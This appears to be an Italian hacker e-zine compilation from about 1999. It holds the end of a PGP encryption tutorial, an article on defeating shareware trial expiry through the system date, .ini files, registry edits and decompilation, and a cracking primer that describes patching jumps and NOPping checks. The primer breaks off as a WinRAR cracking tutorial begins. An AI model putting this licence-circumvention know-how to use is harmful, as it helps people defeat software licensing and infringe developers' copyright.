interlocutore e allora come fare? Mandargliela per mail non mi sembra una
buona scelta infatti essa puo' essere facilmente intercettata....per telefono
...ma dai!!!!
E allora a risolvere tutti questi problemi arriva la chiave asimmetrica...
vediamo....
La crittografia a chiave asimmetrica impone l'utilizzo di due chiavi una
pubblica, che puo' essere distribuita, una segreta da conservare gelosamente.
es. se marco vuole mandare un messaggio a Sara dovra' crittarlo con la chiave
pubblica di Sara da quel momento nessuno (neanche marco) potra' decrittare il
messaggio ad eccezione di Sara; infatti Sara prendera' questo messaggio e lo
decrittera' con la sua chiave segreta!!!
tutto chiaro?
quindi si deduce che le due chiavi generate, pubblica e segreta, sono in
stretta relazione tra loro ma sara' anche matematicamente certo che da una
non si potra' arrivare all'altra!
Il piu' famoso programma di crittografia che sfrutta sistemi asimmetrici e'
il PGP (Pretty Good Privacy) per la sua storia vi rimando al suo sito e ad
una breve ricerca in rete.
Ne esistono diverse versioni, (io uso la 2.6.3i) piu'o meno intuitive.
Fino ad oggi, credo, siamo arrivati alla 6.0 con interfaccia grafica e vari
plug-in......ma il funzionamento e' pressoche' uguale...

COME USARE IL PGP?
Per prima cosa procuratevelo e' ovunque ma per essere piu' sicuro io andrei
nella page ufficiale (www.pgpi.com)
se avete scaricato la 5.x o la 6 fate partire il setup e aspettate ....se
invece avete deciso la via piu' lunga ma molto piu' avvincente bhe' e' ora
di installarlo....dopo averlo unzippato editate l'autoexec.bat ed aggiungete
le seguenti istruzioni...

SET PGPPATH=harddisk:\cartella (es. C:\pgp)
SET TZ=MET-1DST (avete settato la time zone )

e riavviate il computer.
Ora date un'occhiata al config.txt e' molto semplice e spiegato ricordate
pero' che tutto cio' che e' preceduto dal cancelletto(#) non viene letto!!!
quindi se volete spostare le vostre chiavi(fatelo!!!!!!) bastera' modificare
il config.txt ok?
Ora avete anche voi il pgp andate con il prompt sulla cartella dove lo avete
installato e digitate "pgp -h" e cosi' potete avere tutti gli aiuti che vi
servono.....leggetelo...leggetelo attentamente. Ora dobbiamo creare le nostre
2 chiavi ...ce l'ho anche con quelli della versione 5.x per voi e' facile!!!!
vediamo eravamo nel prompt nella cartella del pgp digitate "pgp -kg"
patapam ecco la schermata piu' importante, quella delle nostre chiavi...come
vedrete il programma ci chiedera' a quanti bit dovra'generare la chiave...
credo vi dara' 3 opportunita'....io sceglierei quella da 1024 che garantisce
un ottima sicurezza e non e' lentissimo...ok
ora bisognera' dargli l'userid per la chiave pubblica....immettere il vostro
nome, il nick, uno pseudonimo, insomma quello che cazzo vi pare...potete
anche mettere (ve lo consiglio vivamente) il vostro indirizzo di e-mail
(credo tra apici <>) ok fatto?....adesso e' la volta della passphrase...ma
che diavolo e'?....ragazzi...e' la chiave segreta e non metteteci pippo,
dio, carmela, inter perche' altrimenti che cazzo avete generato a fare una
chiave asimmetrica a 1024 bits.....ok ho esagerato ma sono cose che mi danno
davvero fastidio e poi un po' di rispetto per la NSA...vi chiedera' di
ridigitarla per conferma e se sbagliate non succedera' nulla ma vi fara'
pensare molto!!!!!
Adesso e' la volta di una cosa curiosa, il programma vi chiedera' di digitare
tasti a caso....serve per generare la vostra chiave...il programma prendera'
come casuale la distanza di tempo che passa tra una digitazione(cacafono) ed
un'altra.....ringraziamenti vari...qualche attimo..ed il lavoro e' fatto
avete le vostre due chiavi!!!! Pubring.pgp e Secring.pgp che saranno contenute
nella cartella del vostro pgp e insieme formeranno il vostro keyring.
Siamo a buon punto!!!
Per crittare un file niente di piu' facile...torniamo al nostro prompt....la
nostra cartella e digitiamo pgp -e nomefile.txt(nel caso il file non si
trovasse nella directory del PGP andra' specificato tutto il percorso)
Il PGP adesso ci chiedera' per chi dobbiamo crittare il file e ci fara' vedere
le chiavi che abbiamo nel keyring...scegliete per provare la vostra chiave
pubblica....ci siamo il pgp dopo qualche attimo creera' il nomefile (quello
di prima).asc nella cartella dove si trova il testo in chiaro...abbiamo
crittato il nostro file.
Per decrittare un file (vi ricordo che deve essere stato crittato sulla vostra
chiave pubblica) bastera' dare il comando pgp nomefile.asc...il PGP vi chiedera'
la passphrase...digitatela ed il gioco e' fatto avete un file dello stesso nome
ma senza estensioni.
Bravi ora potete organizzare atti di terrorismo, campagne per la liberazione
di SILVIA BARALDINI senza che nessuno lo sappia.
Ora ultimo passo....importare ed esportare chiavi.....
Per importare le chiavi..ottenuto il file via mail...dischetto...keyserver
etc lo salveremo su un file con estensione .asc e daremo il comando
"pgp -ka nomefile.asc" il PGP vi dira' che e' una chiave nuova e che manca
di certificazione e vi chiedera' se vi fidiate...digitate "Y/N" (se ne siete
sicuri!!!!!) fatto? avete aggiunto la chiave nel vostro keyring e lo vedete
digitando il comando "pgp -kv".
Al contrario se volete estrarre una chiave (ad esempio la vostra che dovete
distribuire) dovrete digitare il comando "pgp -kxa" ...vi verra' richiesto
di digitare l'userid della chiave da estrarre ...fatelo!!!....infine vi verra'
richiesto il nome del file output...digitatelo( preferibilmente usate il
vostro ID o un'abbreviazione che si ricorda meglio) con estensione ".asc" e
se serve digitate il full path dell'output...fatto ora il mondo non puo' piu'
scoprirvi!!!!!

RIASSUNTO COMANDI
(Copiato dal manuale di ZIMMERMANN)

Per cifrare un testo in chiaro con la chiave pubblica del destinatario:
pgp -e filetesto dest_ID

Per firmare un testo in chiaro con la vostra chiave segreta:
pgp -s filetesto [-u mio_ID]

Per firmare un testo in chiaro con la vostra chiave segreta, e produrre un
messaggio in chiaro firmato adatto ad essere spedito via e-mail:
pgp -sta filetesto [-u mio_ID]

Per firmare un testo in chiaro con la vostra chiave segreta, e poi cifrarlo
con la chiave pubblica del destinatario:
pgp -es filetesto dest_ID [-u mio_ID]

Per cifrare un testo in chiaro con la crittografia convenzionale:
pgp -c filetesto

Per decifrare un file, o per controllare l'integrita' di un file firmato:
pgp filecifrato [-o filechiaro]

Per cifrare un messaggio per un numero qualunque di destinatari:
pgp -e filetesto dest1_ID dest2_ID dest3_ID .......

Comandi di gestione delle chiavi:

Per generare la vostra coppia di chiavi pubblica/segreta:
pgp -kg

Per aggiungere il contenuto di un file di chiavi pubbliche/segrete al vostro
portachiavi pubblico/segreto:
pgp -ka filechiavi [portachiavi]

Per estrarre (copiare) una chiave dal vostro portachiavi pubblico o segreto:
pgp -kx ID filechiavi [portachiavi]
o: pgp -kxa ID filechiavi [portachiavi]

Per vedere il contenuto del vostro portachiavi pubblico:
pgp -kv[v] [ID] [portachiavi]

Per vedere "l'impronta digitale" di una chiave pubblica, per verificarla al
telefono con il suo proprietario:
pgp -kvc [ID] [portachiavi]

Per vedere il contenuto e verificare le firme del vostro portachiavi pubblico:
pgp -kc [ID] [portachiavi]

Per modificare l'ID o la frase chiave della vostra chiave segreta:
pgp -ke ID [portachiavi]

Per modificare i parametri di affidabilita' di una chiave pubblica:
pgp -ke ID [portachiavi]

Per rimuovere una chiave od un ID dal vostro portachiavi pubblico:
pgp -kr ID [portachiavi]

Per firmare e certificare una chiave altrui nel vostro portachiavi pubblico:
pgp -ks suo_ID [-u mio_ID] [portachiavi]

Per rimuovere delle firme da un ID in un portachiavi:
pgp -krs ID [portachiavi]

Per revocare permanentemente la vostra chiave, rilasciando un certificato di
compromissione:
pgp -kd mio_ID

Per disabilitare o riabilitare una chiave pubblica nel vostro portachiavi
pubblico:
pgp -kd ID

Comandi esoterici:

Per decifrare un messaggio e lasciarne la firma intatta:
pgp -d filecifrato

Per creare un certificato di firma separato dal documento:
pgp -sb filetesto [-u mio_ID]

Per staccare il certificato di firma da un messaggio firmato:
pgp -b filecifrato

Opzioni di comando da usare in combinazione con altre (formando a volte
parole interessanti!)

Per produrre un file cifrato in formato ASCII radix-64, aggiungere l'opzione
-a quando lo si cifra, lo si firma, o si estrae una chiave:
pgp -sea filetesto dest_ID
o: pgp -kxa ID filechiavi [portachiavi]

Per cancellare il testo in chiaro dopo averlo cifrato, aggiungere l'opzione
-w (wipe) quando lo si cifra o lo si firma:
pgp -sew lettera.txt dest_ID

Per specificare che un testo in chiaro contiene solo testo ASCII, non binario,
e che dovra' essere convertito in testo dal destinatario, aggiungere l'opzione
-t (text) alle altre:
pgp -seat lettera.txt dest_ID

Per vedere il testo decifrato sullo schermo senza salvarlo in un file, come
con il comando "more", usare l'opzione -m (more) quando si decifra:
pgp -m filecifrato

Per specificare che il destinatario potra' SOLO vedere il testo decifrato, e
non salvarlo su disco, aggiungere l'opzione -m:
pgp -steam lettera.txt dest_ID

Per recuperare il nome originale del file di testo quando lo si decifra,
aggiungere l'opzione -p:
pgp -p filecifrato

Per usare un filtro tipo Unix, leggendo da uno standard input e scrivendo in
uno standard output, aggiungere l'opzione -f:
pgp -feast dest_ID <inputfile >outputfile

CONSIDERAZIONI FINALI

Questa sopra e' una breve, scheletrica, semplice guida all'uso di uno dei piu'
bei (mamma mia) programmi che siano stati realizzati, fatene buon uso e
sappiate che si possono fare tante altre cose con il PGP come certificare,
verificare l'integrita' di un documento.......
Se cercate in rete troverete centinaia di informazioni, io vi consiglio la
guida di Giorgio Chinnici

(ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/PGPINTRO-ITALIAN.ZIP)

e il magico Kriptonite....(non ricordo il sito ma se scrivete ve lo mando).
Fate molte prove all'inizio e non cercatemi se vi fottete l'HD :))) e poi
usatelo, usatelo, usatelo e sappiate che se credete veramente nella liberta'
d'espressione oggi qualche preoccupazione dovreste averla.....qui ci loggano
ovunque.....quindi usatelo anche se non avete nulla da nascondere in modo che
il mondo non si stupisca e non si allarmi se qualcuno cerca di difendere un
proprio diritto (a volte capita).....
Nietzcshe nietzsche@angelfire.com
bye


ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°²
²°°°ÛÛ°°°°ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°²
²°°°ÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°²
²°°°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°²
²°°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

- ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- --------/ //\\ //\\ /\\ //\\ || // \------------------
- ®®®®®®® || || // // \\ || ||// f0r BeGiNN&rS ®®®®®®®® -
- ®®®®®®® || || \\ //^ ^\\ || ||\\ by ZioFill ®®®®®®®®
- --------\ \\// || \\// \\\\ // || \\ /------------------
- --------------------------------------
- ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡


quanto mi arrapa fare questi disegnini....

Prima di tutto voglio dire ke il sottoscritto, di Cracking, sa molto
poko, (doh)

anke se sto cerkando di imparare ;quindi in questo artikolo non troverete altro
ke semplici trukketti ke ho imparato nella mia gioventu' sprekata davanti allo
skermo. Queste "PeRLe dI sAgGezza", non hanno niente a ke vedere con il Cracking
vero e proprio quindi se qualke Cracker legge questo artikolo ( ne dubito fortemente)
non si Skandalizzi troppo se ritiene ke abbia sparato qualke kakkiata di troppo....
BiSogna pero' dire ke kon qualke modifika al registro del karo WinTozzen o con un
pikkolo ritokko al kontenuto di alkuni .ini si fottono tranquillamente molte ( piu'
di quante crediate ) di quelle bastardissime sharewere ke Expirano dopo un tot di
giorni ( 30 di solito ) o un determinato numero di Avvii ( 10-12 di solito ).

Inoltre kon questi sistemi si evitano lunghe ricerke di crack per programmi
skonosciuti ke, guardacaso, interessano proprio a noi...
: [
Ringrazio NewBies per avermi dato la possibilita' di scrivere il mio primo artikolo
su questa rivista ( anzi il mio primo artikolo e basta ) e vi avviso ke per gli
eventuali kommenti, critike, correzioni, dikiarazioni di diversita', rikieste di
partecipazione al film CASA BLANKA ecc. potete scrivermi o contattarmi in ICQ
( il mio UIN e' 18576460 )....

premesso questo kredo sia il kaso di kominciare.

Allora, il primo modo ( il piu' zemplice ) per fregare le nostre belle protezioni
e' quello di kambiare la data di sistema ( evviva il Crack avanzato : ).
( per gli esperti: basta doubleClikkare sull'ora nella barra di Win95/98), infatti
molti programmi all'installazione non fanno altro ke registrare ( vedremo poi
dove) il giorno korrente e fare il calcolo di quando il programma dovra' expirare...
Sembra una kazzata ma kon questo trukketto mi sono fatto mezzo sito prima di trovare
il crack apposito per FrontPage....
Ovviamente e' soltanto una soluzione temporanea intanto ke non trovate il crack
o lavoriate a qualke sistema piu' dignitoso.

Un'altro metodo per fregare le nostre belle Sharewere eXpiranti e' quello di andare
a modificare, kome dicevo prima, i files .ini,

ma ke kakkio sono gli ini (gli esperti domandano)?

Ebbene gli .ini non sono altro ke dei file in formato testo ( apribili e modifikabili
quindi kon NotePad) ke un programma legge all'avvio per raccattare alkune informazioni,
precedementemente settate da voi o di default.( spiegazione kiara&Zemplice )
Un esempio di file .ini, e' Win.ini ke kontiene, appunto, le informazioni per
il karikamento del beneamato&Rispettato Sistema Operativo WinKazze & anke
quelle di alkuni programmi ( mi pare ke tra questi vi sia anke WinZip ), e
quindi e' sempre meglio dargli un okkiata.

Ma dove si trovano di solito questi simpatikoni (kiedono insistentemente sempre
gli stessi esperti )?

Ebbene di solito si trovano o nella stessa kartella del programma oppure in quella
di WinDouZzz &,a volte, hanno lo stesso nome del programma a cui si riferiscono
( kakkio ma sono intelligenti sti programmatori... : ) komunque e' konsigliabile,
fare sempre un bel "TRova" => *.ini ke non si sa mai ke gli amiketti siano in
cartelle sconosciute con nomi inimagginabili per le menti dei komuni mortali
( quelli della mikrosoft sopratutto ,anke se non sembrerebbe, hanno una fantasia
insuperabile....) quindi probabilmente si chiameranno kon la sigla del programma
e il numero della versione o kose del genere.
Per trovare gli .ini potete provare anke ad editare il file .log ke troverete
nella stessa cartella del programma ( serve all'unistaller dell'applicazione
per sapere quali files dovra' cancellare ) ke non si sa mai ke vi sia proprio
kuello ke stiamo cerkando (raro, komunque provate).
0k, ora, una volta trovato sto kazzo di .ini ke si fa?
E' zemplice, basta editarlo ( kon Notepad o kon quel kakkio ke vuoi ), e cercare
le righe piu' interessanti....
Ad esempio guardate dove c'e' scritto qualcosa tipo
RUN COUNT seguito da = e un numero, o qualcosa di
simile, in caso avviate il programma e riguardatevi l'ini per vedere kosa e'
kambiato, o fate un po' voi; una volta trovata la riga desiderata fate una
kopia dell'ini in questione e provate a modificarlo a vostro piacimento.
Ad esempio se il numero dopo RUN COUNT e' diminuito dopo l'avvio del programma
aggiungete o, se al contrario e' aumentato, diminuitelo...

non e' komplikato giusto?

Alkuni programmi, invece ke salvare le proprie impostazioni in qualke ini sperduto,
utilizzano il registro di WinZoZZ&N....
Ma dove kakkio e' il registro? ( sono sempre loro )
per poter controllare cio' ke e' salvato nel registro basta andare nella directory
di Win e clickkare su regedit.exe, oppure, piu' semplicemente eseguire regedit
dalla barra delle applikazioni del nostro karo O.S.
Una volta fatto cio' vi komparira' una finestra kon un bel tree ( deh hi ho )
a sinistra kontenente le seguenti kartelle:

-  Risorse del computer
|+  HKEY_CLASSES_ROOT
|+  HKEY_CURRENT_USER
|+  HKEY_LOCAL_MACHINE
|+  HKEY_USERS
|+  HKEY_CURRENT_CONFIG
|+  HKEY_DYN_DATA

o kualkosa del genere,

a questo punto dobbiamo cercare dove esattamente nel registro il programma si
segna quando dovra' Expirare o quante volte lo abbiamo avviato.
Anke qua, kome negli .ini, la kosa puo' rivelarsi piuttosto Z&Mþliœ se il
programma salva le impostazioni sotto una chiave ( credo ke si kiamino kosi'
le "cartelle" del registro ) con il suo stesso nome, ed in questo kaso troverete
probabilmente cio' ke cercate in:


-  Risorse del computer
|+  HKEY_CLASSES_ROOT
|-  HKEY_CURRENT_USER
|+  Software
|+  nome del programma
|+  HKEY_LOCAL_MACHINE
|+  HKEY_USERS
|+  HKEY_CURRENT_CONFIG
|+  HKEY_DYN_DATA


( cioe' in HKEY_CURRENT_USER => Softwere => nome del programma )

Se non e' cosi' allora la kosa potrebbe rivelarsi piu' incasinata del previsto. : |
In ogni caso, visto ke il simpatiko registro ci mette a disposizione l'opzione
"Trova", tanto vale utilizzarla, provando un po' di nomi inerenti al programma
(sigla o roba simile ), e vedere se trova qualkosa da qualke parte.
Se non fosse cosi' non rimane altro da fare che cercare manualmente ( DOH :))).
In questa ricerka vi possono aiutare alkune utility kome regmon ( ke dovrebbe
essere allegata a questo artikolo ) ke non fanno altro ke registrare tutte le
modifiche apportate al registro da un determinato programma e mostrarcele
( mi pare ke anke le Utilities del buon Dottor Norton abbiano una funzione
simile da qualke parte ).
A questo punto non dovete fare altro ke avviare il programma e guardare su
regmon ( o su dove kakkio volete ), dove va' a leggere la Shareware quando
controlla se la copia e' Expirata o meno.
Nel kaso di RegMon troverete un kasino di stringhe del genere: ( app. vi
konsiglio di Disattivare subito "Capture Events" per poi attivarlo quando
vorrete far partire l'applicazione e capirete poi il perche' )


# | Process | Request | Path | Result | Other

365 Wb98 OpenKey HKLM\Softwere\Microsoft\.. Success
..

Cioe':

~~~~~~~~~~~~~~D~E~H~~H~I~~H~O~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# = Numero processo.
Process = Nome dell'applicazione ke l'ha eseguito.
Request = Rikiesta da parte dell'applikazione.
Path = Dove e' andato a leggere nel registro.
Result = Se la rikiesta fatta e' andata a buon fine o meno.
Other = Altro.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Una volta ke avete la lista di tutti i processi avvenuti, ( scartate subito
quelli di Explorer ), non dovete fare altro ke guardare dove e' andato a
leggere nel registro ( guardate sotto Path )il nostro bel programmino.
Se alla fine di tutto cio' siete riusciti a trovare la kiave in cui vengono
salvati i valori da noi cercati ( come la data in cui il programma morira'
o quanti avvii vi rimangono ), e kambiare il valore ( nella parte destra di
regedit ) in modo da avere crediti illimitati o ritardare la morte della
sharewere.

Se non siete riusciti ne kon gli ini, ne kon il registro non disperate ci sono
altre soluzioni.
Infatti potreste cercare di kapire kon ke kosa e' stato programmato il suddetto
program ( Visual Basic, C++, ecc. ) ed agire di konseguenza procurandovi un
dekompilatrore Appozito.

Ma ke e' un Dekompilatore?

Ebbene, ( e ditemi se sbaglio ) ogni programma prima di essere un exe e' un
progetto, cio' ke fa un compilatore e' rendere questo progetto in un exe, e
il dekompilatore rende, logikamente, un exe in progetto.
Una volta ke abbiamo il progetto possiamo fare tutto quello ke vogliamo.
faccio un esempio, se ho una sharewere ke sekondo me e' stata kompilata in VB
allora mi procuro il dekompilatore Vb e naturalmente Visual Basic ( maddai???? )
una volta fatto questo si dekompila il prog. & basta dare un'occhiata al codice
per capire quando va a controllare se l'userId e la password ke inseriamo per
registrarci e' korretta e quindi agire di konseguenza...
( Se non konoscete il linguaggio in questione non vi preoccupate, vi assicuro
ke non serve essere degli esperti programmatori per fare cio' ke vogliamo fare....)
Inoltre avendo un programma decompilato avete il vantaggio di poter fare qualke
modifika al look o kose del genere ( La Violazione di CopRight e' una kosa
bastarda e immorale ma divertentissima...., P.S. in fondo se non distribuite
la roba ke modifikate ki kakkio volete ke venga a rompervi i koglioni?)

app.
Se possedete il divino VB, provate a mettere il programma ke volete rendere
immortale in un OLE, non kiedetemi perke' ma a volte il kontatore non va' o
komunque la sharewere non riesce a suicidarsi.
E se invece Vb non lo possedete potete ottenere risultati simili ( kredo )
settando l'exe in sola lettura, ma non vorrei sbagliarmi.


Altri programmi, addirittura, non contenti di segnarsi l'expirazione (una volta
avvenuta ) in qualke ini o nel registro, vanno a tokkarci il Bios ( Bastardi }=\\.
( Quando delle applikazioni usano questo tipo di protezione Ve ne accorgete
subito ,perche', se provate a: disinstallarli, cancellare tutti gli ini a loro
riferiti, eliminare tutte le kiavi nel registro ke potrebbero, anke lontanamente,
riferirsi a loro, quando li rEinstallerete all'avvio vi ritroverete ankora con
il vostro shareware passata a miglior vita...

ke fare?

Qui la kosa si fa piuttosto komplikata, infatti, a quanto so' ci sono in giro
dei programmini ke permettono di interagire kon il Bios potendo kancellare i
dati kontenuti ma qui rientriamo nel VERO Crack.
Si puo' interagire kon il Bios all'avvio del cpu, premendo canc ma non kredo
ke da li otterete molto.
Quindi, kon questi tipi di protezioni konviene, kome dicevo anke prima,
dekompilare brutalmente, ed eliminare la parte in cui va a leggere l'expirazione
nel bios ( ma sinceramente e' un metodo ke non ho mai provato kon questo tipo
di protezione quindi non posso assikurarvi niente ) oppure provare a modifikare
i files dell'installazione....

komunque, oltre a provare i metodi ke vi ho indikato sopra, vi konsiglio di
editare sempre tutti i file kontenuti nella cartella del programma ( kompresi
quelli dell'installazione ) kon Notepad, che magari kon un po' di fortuna
( anzi mooooolta fortuna ) riuscite a kombinare kualkosa o, komunque, a
racimolare informazioni preziose.

E kon questo e' finito e si kiude l'era di kosi kom'e'...
e se ne riapre un'altra....
e sono kazzi tuoi....
{A31}

Deh hi ho

ringrazio ankora la NewBies per la possibilita' offertami e ki ha letto questo
artikolo, kome ho gia' scritto all'inizio i komment di ogni tipo sono ben
accetti, bazta scrivermi.

saluto inoltre: SKiZzO, Caratt, Ripper, nEcRoSoFt, Alan, Carlitos ( Mazzu ),
tozzo, skott, -sAnto-_-sAtAnello- , Pippo, New Avator, TOTILA,
RedFly, Homer J. Simpson, Matt Groening & quanti ora non
rammento...


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
¿¿¿¿¿¿¿¿Z I O F I L L@@HomAPaGia: http://members.tripod.it/ZioFill ¿¿¿¿¿¿¿¿¿¿¿
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NOTA BY N0bodY88 = speriamo che questo sia solo il primo di una lunga serie di
articoli....ciauz ZioFill :))))

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ CRACKING QUESTO SCONOSCIUTO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Chi di voi non ha mai scaricato un crack? Tu, tu e tu, FUORI! E chi di voi
non si e' mai chiesto come venissero fatti questi utilissimi programmini?
Ok, voi che avete alzato la mano, fuori anche voi! Chi di voi non sa cos'e'
l'assembler, una decompilazione, un offset o un hex-editor? Ok, fuori e non
rientrate finche' non vi sarete documentati. Fatta questa breve premessa,
bisogna iniziarne un'altra :P
Chi vuole diventare un cracker deve sapere le basi. Tutti possono dire "io so
cosa e' un crack"
, ma il cracking vero non e' fatto a scopo di lucro, bensi'
solo per sfida o per poter testare un programma a fondo senza essere annoiati
da schermate scassapalle con scritto "Registrami!". Se un programma vi piace,
COMPRATEVELO! Per esempio, io Windows98 non l'ho comprato ;) ma Commandos si'!
Inoltre se volete crackare qualcosa, scaricatevi dei programmi vecchiotti e
crackate quelli, per un motivo che vi spieghero' subito. Gli schemi di
protezione + o - sono sempre gli stessi: scrivi una password, ammacca OK appena
spunta il nag screen, ecc. Mai nessuno progetta delle vere e proprie protezioni
sicure dai cracker. Percio' sapendo come crackare le protezioni piu' vecchie,
potrete crackare quelle piu' nuove, avendo la necessaria base di conoscenza,
visto che le variazioni rispetto alle protezioni piu' vecchie sono minime.
Inoltre cercate di crackare dei giochi. Infatti per i giochi mettono SEMPRE
protezioni piu' difficili delle altre. Queste protezioni una volta "passate
di moda"
vengono utilizzate per i comuni programmi shareware. Per fare un
esempio ipotetico potreste trovare la protezione di Commandos (che si basa
sull'inserimento nel CD originale di file fasulli delle modeste dimensioni
di 1 Gb l'uno) nel Photshop 6.0 (che ancora non esiste). Sapendo quindi come
si cracka, sarete i primi a rilasciare un crack! Bello no ;) ? Comunque,
passiamo in rassegna i principali tipi di protezione e il loro modo di
sprotezione:

1) Protezioni con password, serial, o altri codici numerici, alfanumerici o
letterali
Metodo di sprotezione: Basta disassemblare il tutto e invertire i jump, vi
spieghero' cosa vuol dire nel tutorial sul cracking
2) Protezioni con Nag-Screen
Bisogna trovare la routine che chiama il Nag e disabilitarla col comando NOP
3) Protezioni con contatori di tempo o di giorni
Bisogna trovare il metodo in base al quale fanno salire il contatore. Puo'
essere il compare tra una variabile che indica il tempo massimo e il tempo
attuale, o altre schifezze...
4) Protezioni su CD o Diskette Cheking, ossia controllo del CD o del dischetto
nel drive
Basta NOPpare le chiamate ai controlli sui drive o eliminarle del tutto dal
codice.
5) Protezioni basate su Dongle (chiave hardware)
Ehm...ca**o queste sono difficilotte da crackare, perche' bisogna o emulare
le funzioni del dongle via software, o peggio ancora, sono incrackabili se
non clonando il dongle...la nostra fortuna e' che produrre chiavi hardware
costa molto alle software house, che per ridurre i costi e fare maggiori
guadagni si limitano alle pass...tutto a nostro favore ihihihih...
6) Protezioni che disabilitano alcune funzioni del software
Un tipo di protezione che, siceramente, non ho mai incontrato. Dai pochi
documenti che ho letto su questo argomento ne ho dedotto che sono a volte
facili, a volte difficili, ma sinceramente non capisco come si possano
attivare delle funzioni...muaH...

Io, dal basso della mia esperienza (che vi credete, sono un newbie anche io!! :),
posso essere credibile solo per il primo tipo di protezioni, visto che sono le
piu' facili, e visto anche che tutti gli altri tipi richiedono il Soft-Ice (che
comunque oggi 5/3/1999 mi son fatto passare, grazie N0bodY :). Allora, prima di
tutto ogni cracker ha i suoi attrezzi. Come ogni bravo artigiano ha seghe,
martelli, pialle noi abbiamo disassemblatori, debuggers, hex-editors. I primi
servono a disassemblare un programma, ossia decompilare un programma in modo
da portarlo in assembler. Avere il listato di un programma in assembler e'
utilissimo, visto che grazie al WDasm 8.93 (ovviamente crackato ;), cioe' il
nostro disassemblatore di fiducia, possiamo, grazie ad alcune ricerche facili
e veloci, scoprire il serial, oppure fare in modo di editare il programma cosi'
che qualunque pass noi mettiamo il programma la accetta. Immaginatevi che bello:
"Winxxxx Registered to: <inserisci il tuo nome o nick> Serial: i'm an evil
cracker and hax0r"
che figurone con gli amici no? Il debugger e' una cosa
ESSENZIALE nei crack piu' difficili. Infatti grazie al debugger (il migliore e'
senza dubbio il Soft-Ice) possiamo impostare dei Breakpoint detti in gergo BPX,
ossia delle "interruzioni su procedura", ossia interruzioni che si verificano
al momento di inserire il codice o altro. Per esempio se noi al prompt nostro
Soft-Ice scriviamo "BPX GetWindowTextA" appena verra' chiamata la procedura
GetWindowTextA (che e' una procedura di una API di Windows, che serve a
prendere un testo da una dialog) il debugger blocchera' tutto mostrandovi
quello che il programma da crackare stava per fare...cosi' che voi possiate
agire di conseguenza :) Gli hex-editors, beh, se non li conoscete ritiratevi,
il mestiere di cracker non fa per voi. Ma passiamo adesso al tutorial!!!

TUTORIAL No.1: COME CRACKARE IL WINRAR95.EXE (VER 2.03)
Mmm, la prima cosa da fare e' procurarsi i necessari tools. Andate al sito
www.crackstore.com e nella sezione tools scaricatevi il Wdasm 8.93 e l'Hiew
6.00. Se ci sono versioni piu' recenti non fate i lamer0ni e dite "ahhhhh
non e' quello che hai detto tu percio' non lo prendo"
, ma arraffateli lo
stesso. Allora, dopo avere preso i proggie installateveli (ossia scompattateli
dove vi pare e piace) e createvi due copie di WINRAR95.EXE, una la chiamate
WINRAR95.<estensione che vi piace> e un'altra WINRAR95.W32. Adesso aprite il
